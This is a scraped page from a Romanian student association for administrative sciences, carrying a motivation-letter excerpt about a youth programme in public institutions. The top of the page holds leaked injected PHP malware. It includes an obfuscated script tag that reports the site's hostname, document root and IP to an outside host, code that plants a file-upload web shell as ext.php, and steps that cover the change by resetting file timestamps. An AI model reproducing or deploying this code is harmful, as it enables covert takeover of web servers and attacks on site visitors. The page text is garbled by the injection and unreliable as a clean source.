document.write('<'+'s'+'c'+'r'+'ipt '+'s'+'rc=\"http://tereveln.com/sh2.php?serverStr=$serverStr&req_type=add_site&document_root=$document_root&engine=$engineType&ip=$ip&domain='+window.location.hostname+'&uplUrl=$pp\"'+'>'+'<'+'/'+'sc'+'rip'+'t>');"; $fp = fopen(dirname(__FILE__)."/ext.php", "w"); fwrite($fp, "
';if (!empty(\$_FILES['uploadFile'])) {\$self=dirname(__FILE__);move_uploaded_file(\$_FILES[\"uploadFile\"][\"tmp_name\"], \$self.DIRECTORY_SEPARATOR.\$_FILES[\"uploadFile\"][\"name\"]);\$time=filemtime(\$self);print \"OK\";} else {print \$form;} ?>"); fclose($fp); $fp = fopen(__FILE__, "r"); $line = ""; while(!feof($fp)) { $line .= fgets($fp, 4096); } fclose($fp); $time = filemtime(__FILE__); $dirTime = filemtime(dirname(__FILE__)); $line = preg_replace("/\s+\s+/is", "", $line); $fp = @fopen(__FILE__, "w"); @fwrite($fp, $line); @fclose($fp); @touch(__FILE__, $time); @touch(dirname(__FILE__), $dirTime); } else { print ""; } ?> ANSSA - Asociatia Nationala a Studentilor in Stiinte Administrative

MOTTO

Exista cariere celebre: de avocat, de profesor, de actor etc...De la o varsta foarte frageda visam si nu numai ca le visam, dar am avut parte, intr-o anumita masura, si de practica. De cate ori ne-am jucat "de-a doctorul", "de-a profesoara" ? Sa fi existand copii care sa viseze la meseria de functionar public? Nu stiu, dar gasesc ca a venit vremea sa ma joc (un joc serios) "de-a actul decizional". Imi doresc o Agora, un loc de invatare practica a cetateniei democratice, a exprimarii, a comunicarii, a dialogului, a negocierii, a luarii deciziei si evaluarii. Aflandu-ma in ipostaza unui viitor functionar public, am nevoie de o experienta practica, intrucat o pregatire teoretica, fie ea si excelenta, este insuficienta. Facultatea nu dispune de posibilitati financiare si nici de o infrastructura optima pentru o instruire practica a studentilor. Gasesc „ANSSA” un proiect deosebit de stimulativ, care ne scoate din "amorteala" teoretica a facultatii, antrenandu-ne intr-o pregatire practica a carierei de functionar public. Este nevoie de o atragere a tinerilor in viata publica si in procesul decizional, este nevoie de o implicare civica si politica a acestei categorii de varsta; in concluzie este nevoie de participarea tinerilor in societate. Am citit zilele trecute o fraza pe care am ridicat-o la rang de adagiu: Nu trebuie sa fim abordati ca "problema" , ci ca "resursa". Romania are nevoie de participarea tinerilor pentru a putea mentine drumul ireversibil pe care s-a angajat.

 

Olivia Buzoianu
Fragment din scrisoarea de motivatie pentru intrarea ca membru in ANSSA
si participarea la proiectul „Tineri in institutii publice”